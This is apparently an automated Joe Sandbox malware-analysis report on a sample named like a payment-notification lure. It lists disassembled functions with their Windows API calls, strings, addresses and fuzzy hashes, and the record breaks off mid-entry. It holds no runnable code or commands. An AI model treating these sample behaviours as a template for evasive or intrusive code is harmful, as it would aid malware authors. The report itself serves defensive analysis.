Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 1c6e96d191816f783408d27b5f5a7bdbeb40c6f0c6833495c2ab41636709ebcb
Instruction ID: 939b2df48fc2f87bfd5e5ab8ec7167749f8affe69ea23d3ef6ca0b5b159af603
Opcode Fuzzy Hash: 1c6e96d191816f783408d27b5f5a7bdbeb40c6f0c6833495c2ab41636709ebcb
Instruction Fuzzy Hash: 3A012B72755222ABCB314B79EC44E577B9CEF05BA1B108620F919E3140C731DD09C7E0

Function 00997464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0099747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00997497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009974AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009974CA

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 2ce63fc0e8b5ff2245e5ca37df1453d1f84b399949422f0ee3bc55f1fea1ca9a
Instruction ID: bef10ecdba7ac7425737b67fbdd35ff45609ee7e5eab76591c8ef0031218dc3f
Opcode Fuzzy Hash: 2ce63fc0e8b5ff2245e5ca37df1453d1f84b399949422f0ee3bc55f1fea1ca9a
Instruction Fuzzy Hash: 7711C4B16193149FEB208F98DC08F92BFFDEF00B00F108969E61AD6162DB74E904DB90

Function 0099B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0099ACD3,?,00008000), ref: 0099B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0099ACD3,?,00008000), ref: 0099B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0099ACD3,?,00008000), ref: 0099B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0099ACD3,?,00008000), ref: 0099B126

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: fd608482660757398f4952d22e56bfac23f42bcbb574ae573d256e9ae22a1c9e
Instruction ID: 19f533ca36e056641c48064606a73d6e2c6d14285b79ca0d80ab4923a7752f1a
Opcode Fuzzy Hash: fd608482660757398f4952d22e56bfac23f42bcbb574ae573d256e9ae22a1c9e
Instruction Fuzzy Hash: CE11AD70C0862CEBCF10AFE9EAA8AEEBF78FF49310F014085D941B2185CB384650DB91

Function 00992DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00992DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00992DD6
GetCurrentThreadId.KERNEL32 ref: 00992DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00992DE4

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 8dab3f46cf05f1cc3a569c8e1173c733c7d018b4c4340d106bcb504b681cb56d
Instruction ID: bd60893a2ee5ad41730e0c85979f095bcf1c3c9db3751211762671c48a558030
Opcode Fuzzy Hash: 8dab3f46cf05f1cc3a569c8e1173c733c7d018b4c4340d106bcb504b681cb56d
Instruction Fuzzy Hash: 2DE092B19192247BDB201B779D0DFEB3E6CEF52BA1F010015F10AD10809AA4C841D7B0

Function 009C8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00949639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00949693
Part of subcall function 00949639: SelectObject.GDI32(?,00000000), ref: 009496A2
Part of subcall function 00949639: BeginPath.GDI32(?), ref: 009496B9
Part of subcall function 00949639: SelectObject.GDI32(?,00000000), ref: 009496E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 009C8887
LineTo.GDI32(?,?,?), ref: 009C8894
EndPath.GDI32(?), ref: 009C88A4
StrokePath.GDI32(?), ref: 009C88B2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 709a1fcdfa0a4612c6d3f8573b7de37092f089cf6f2b607aa134bb8b48903c72
Instruction ID: 69432b3417e5269e208fa1876845fd079b3f7e167b584a546d1812bbd43324d0
Opcode Fuzzy Hash: 709a1fcdfa0a4612c6d3f8573b7de37092f089cf6f2b607aa134bb8b48903c72
Instruction Fuzzy Hash: 65F0BE36409218FADF129F94AC09FCE3F19AF06310F448004FA21610E1C7741512DFE6

Function 009498B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009498CC
SetTextColor.GDI32(?,?), ref: 009498D6
SetBkMode.GDI32(?,00000001), ref: 009498E9
GetStockObject.GDI32(00000005), ref: 009498F1

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: d0439afbab731ca509e68ea52486b579705e0661dfe728c2e6e746ae293748c8
Instruction ID: c4c85e29f21694b9ba58f9e9da71ceaf1882ca501d32f6a00b03366cc8a4fb61
Opcode Fuzzy Hash: d0439afbab731ca509e68ea52486b579705e0661dfe728c2e6e746ae293748c8
Instruction Fuzzy Hash: EDE09B71A5C280AEDB215B75FC09FE97F15EB11335F188219F6FD540E1C3718640AB10

Function 0099162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00991634
OpenThreadToken.ADVAPI32(00000000,?,?,?,009911D9), ref: 0099163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009911D9), ref: 00991648
OpenProcessToken.ADVAPI32(00000000,?,?,?,009911D9), ref: 0099164F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: d60405056e2a79cb0dcb32562670160a758315004d326735422838deeaad2ade
Instruction ID: 08a586a6e831c264d3ec2c8cc3009d0a65e40e43b7d8b40a1d59b2a984295436
Opcode Fuzzy Hash: d60405056e2a79cb0dcb32562670160a758315004d326735422838deeaad2ade
Instruction Fuzzy Hash: 74E086B1E15211DBDB201FA4AD0DF463F7CBF44791F184808F249D9080D7348441D750

Function 0098D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0098D858
GetDC.USER32(00000000), ref: 0098D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0098D882
ReleaseDC.USER32(?), ref: 0098D8A3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 807594fde8449a3515243f23e4d93dae5f852ac25643d4b747263c598e722f92
Instruction ID: 86cddcbebc020e1c04019af38642e730d356d2c6f7be802fc9de494296cd7603
Opcode Fuzzy Hash: 807594fde8449a3515243f23e4d93dae5f852ac25643d4b747263c598e722f92
Instruction Fuzzy Hash: C1E01AF4C14205DFCF41AFA0DA0CA6DBFB1FB08310F148409E84AE7250C7389902AF40

Function 0098D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0098D86C
GetDC.USER32(00000000), ref: 0098D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0098D882
ReleaseDC.USER32(?), ref: 0098D8A3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 949491cb275fd4e9588cab37c0f56bd8978a9f1fd07d415e77c7466ad4c3f205
Instruction ID: fbb6cafef3fb4597e2621addf303554a0cf34b44e45f3f5968806f9681b620c9
Opcode Fuzzy Hash: 949491cb275fd4e9588cab37c0f56bd8978a9f1fd07d415e77c7466ad4c3f205
Instruction Fuzzy Hash: 9BE092B5C18605EFCF51AFA0DA0CA6DBFB5BB48311F148449E94AE7250CB399902AF50

Function 009A4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00937620: _wcslen.LIBCMT ref: 00937625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 009A4ED4

Strings

LPT, xrefs: 009A4DFB
*, xrefs: 009A4E10

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: c9b50780fd94c1b4f9bd799b21bbf91067bcf8f286f5974abbae5d3b8bb3665a
Instruction ID: c10fbb3a543466c8b0d53489373bd215ed0485204ac5f37de9e8356a575623d4
Opcode Fuzzy Hash: c9b50780fd94c1b4f9bd799b21bbf91067bcf8f286f5974abbae5d3b8bb3665a
Instruction Fuzzy Hash: 01914F75A002049FCB14DF58C485EAABBF5BF89308F198099E80A9F362D775ED85CF91

Function 0095E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0095E30D

Strings

pow, xrefs: 0095E2E5, 0095E302

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4b27c22e0f147347331c8e8f0837589319ab0946960a7f918d4017781dce5577
Instruction ID: d626e58f4c99010729be8f808943e16d6b2ecdc14dd3c04b722a51e4de180614
Opcode Fuzzy Hash: 4b27c22e0f147347331c8e8f0837589319ab0946960a7f918d4017781dce5577
Instruction Fuzzy Hash: 9951AE61A1C20296CB1AF759CD01379BB9C9B50746F304D99E8D6432F8EB378DCD9B42

Function 0094E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0094E1B1

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 99b9676de54b64b298b52db3c52957dd20afead13c6a25fe6ebee751dcc401c6
Instruction ID: a533d9f8a7a6885b8b913c489fa23c601377655a5347d1f66e8b35b462a048c8
Opcode Fuzzy Hash: 99b9676de54b64b298b52db3c52957dd20afead13c6a25fe6ebee751dcc401c6
Instruction Fuzzy Hash: 5F513575A08246DFDB15EF28C4A1AFA7BA8FF55310F248059ECA19B3D0D7749D42CBA0

Function 0094F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0094F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0094F2BB

Strings

@, xrefs: 0094F2AF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 7445afee7ac7c6d90110fd1110abf1df9d74b86886acca4f51522ff0e506ced8
Instruction ID: e9ca09ab8416bc50e8959885da5f30fab7a3a48e877e5794930679e3d1b6d9c3
Opcode Fuzzy Hash: 7445afee7ac7c6d90110fd1110abf1df9d74b86886acca4f51522ff0e506ced8
Instruction Fuzzy Hash: 7C5104B141C7489BD320AF50D886BAFBBF8FBC4300F81885DF199511A5EB719929CB67

Function 009B5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009B57E0
_wcslen.LIBCMT ref: 009B57EC

Strings

CALLARGARRAY, xrefs: 009B57E6, 009B57EB

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: ac97325f782c252dd76f4d765d70d590a168e10fb4f70868c7cfd1f9bfe3e32d
Instruction ID: f3d4caf2a11fc08fc1815948e5232f3c3dc81d1d8f4d3f0f524ed28024b42c6b
Opcode Fuzzy Hash: ac97325f782c252dd76f4d765d70d590a168e10fb4f70868c7cfd1f9bfe3e32d
Instruction Fuzzy Hash: 2541AE71E002099FCB14DFA9C982AFEBBF9FF99324F154029E505A7261E7349D81CB90

Function 009AD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009AD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009AD13A

Strings

|, xrefs: 009AD10B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 6779c87e699e1b13b2fa964917e84c1bd0fdd2498e7b137461ed2e2cee53b4a6
Instruction ID: 18cf6058e1895fce5b1b73afdeb3d707a862d15ae19e4de86891e2fea408b900
Opcode Fuzzy Hash: 6779c87e699e1b13b2fa964917e84c1bd0fdd2498e7b137461ed2e2cee53b4a6
Instruction Fuzzy Hash: FC312C71D01209ABCF15EFA5CC85AEEBFBAFF4A300F004019F819A6161D735AA56DF90

Function 009C356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 009C3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009C365C

Strings

static, xrefs: 009C35BC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ec48bc854bf15fc52b44aaaf929061252f34e9f89463d02ea6c2ad75382afb94
Instruction ID: 664f7df58026c59d732265dc6c1405ce3b4672f2cc6847e511ce67343666f569
Opcode Fuzzy Hash: ec48bc854bf15fc52b44aaaf929061252f34e9f89463d02ea6c2ad75382afb94
Instruction Fuzzy Hash: C6317871910604AADB109F68D881FFB77ADEF88724F00D61DF9A997280DA31AD81DB61

Function 009C4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 009C461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009C4634

Strings

', xrefs: 009C458E

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 48dbbd6a1a15648636795d570c41693f27f942c63993522925914e96579b7c8a
Instruction ID: 2af20b94f969436dc9d3f017c1bcf05133f041e992c01038aab90143c1752e82
Opcode Fuzzy Hash: 48dbbd6a1a15648636795d570c41693f27f942c63993522925914e96579b7c8a
Instruction Fuzzy Hash: 75310674F0124A9FDB14CFA9C9A0FEABBB9FB49300F14406AE905AB355D770A941CF91

Function 009C31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009C327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009C3287

Strings

Combobox, xrefs: 009C3249

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: bb2799ee56615638f3b03db4a3b7c73f1aba710bb191326ab12755014e3c69c5
Instruction ID: d1a748cf0e6b2d1ae8b2d2a760b49cd096ff8e2693bd47a22d21e045b60ccc79
Opcode Fuzzy Hash: bb2799ee56615638f3b03db4a3b7c73f1aba710bb191326ab12755014e3c69c5
Instruction Fuzzy Hash: 6011E271B002087FEF219E94DC80FBB3B6EEB98364F10C128F92897290D6319D518B61

Function 009C3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0093600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0093604C
Part of subcall function 0093600E: GetStockObject.GDI32(00000011), ref: 00936060
Part of subcall function 0093600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0093606A

GetWindowRect.USER32(00000000,?), ref: 009C377A
GetSysColor.USER32(00000012), ref: 009C3794

Strings

static, xrefs: 009C3757

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 5eca0a0601a7f9b7840933b6cb6c41531181482ee59eb5910e24459a72ed0155
